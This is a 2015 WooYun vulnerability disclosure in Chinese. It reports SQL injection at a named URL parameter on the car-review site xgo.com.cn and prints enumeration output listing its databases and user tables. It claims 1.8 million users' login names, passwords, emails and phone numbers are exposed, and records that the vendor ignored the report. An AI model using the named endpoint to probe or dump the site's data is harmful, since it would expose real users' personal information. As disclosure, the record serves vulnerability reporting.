当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142524

漏洞标题:汽车点评某重要站点存在SQL注入(涉及180W用户)

相关厂商:xgo.com.cn

漏洞作者: 路人甲

提交时间:2015-09-21 11:25

修复时间:2015-09-26 11:26

公开时间:2015-09-26 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://api.xgo.com.cn/show_survey.php?surveyid=2

21.png

available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tips_admin
[*] xgo_topic
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu

Database: xgo_user
[92 tables]
+---------------------------+
| user_relations |
| userinfo |
| user_active_log |
| user_checkimg |
| user_album_pic |
| user_check_mobile_code |
| user_online |
| user_real |
| user_extend |
| user_mail_set |
| user_message_2011 |
| user_message_2014 |
| user_register_log |
| user_message_2013 |
| user_message |
| user_album_info |
| user_score |
| user_check_mail_code |
| user_oltime_2015 |
| user_message_2012 |
| user_oltime_2011 |
| user_oltime_2013 |
| userinfo_test |
| userinfo_new |
| user_visitor |
| user_oltime_2012 |
| user_oltime_2014 |
| x_invite_code |
| z_login_api |
| z_api_token |
| tag_from_pic |
| tag_from_user |
| user_car_list_product_rel |
| x_user_score |
| x_userinfo_extend |
| x_log_login_2013 |
| audit_log |
| x_check_mail_code |
| user_comments |
| x_log_send_mail_2013 |
| user_tag2 |
| x_register_history |
| user_album_pic_tags |
| user_carport |
| china_city |
| x_check_mobile_code |
| x_user_car |
| x_log_login_2015 |
| user_interest_doc0 |
| user_book_collection |
| x_log_login_2014 |
| x_log_send_mail_2014 |
| whitelistuser |
| x_log_modify_pwd_2013 |
| user_obj_comments |
| tag |
| user_car_list |
| user_tag_num |
| x_register |
| x_log_send_mail_2015 |
| checkimg_group |
| china_town |
| gift_present |
| tag_user9 |
| tag_user1 |
| tag_user8 |
| x_oauth_bind |
| user_owner_info |
| tag_user7 |
| tag_user3 |
| user_hide |
| x_log_modify_pwd_2014 |
| tag_user5 |
| tag_user6 |
| z_login_api_bark |
| tag_user4 |
| gift_buy |
| tag_user2 |
| x_log_modify_pwd_2015 |
| user_interest_doc17 |
| user_car_list_vote_1 |
| tag_user10 |
| user_interest_doc18 |
| china_province |
| user_tag1 |
| gift |
| user_active_cate |
| user_rank |
| gift_sort |
| user_modify_pw_log |
| x_user_verify |
| xgo_qq_session |
+---------------------------+

涉及180万用户信息:

22.png

涉及登录用户名,密码,邮箱,手机等信息:

15.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-26 11:26

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论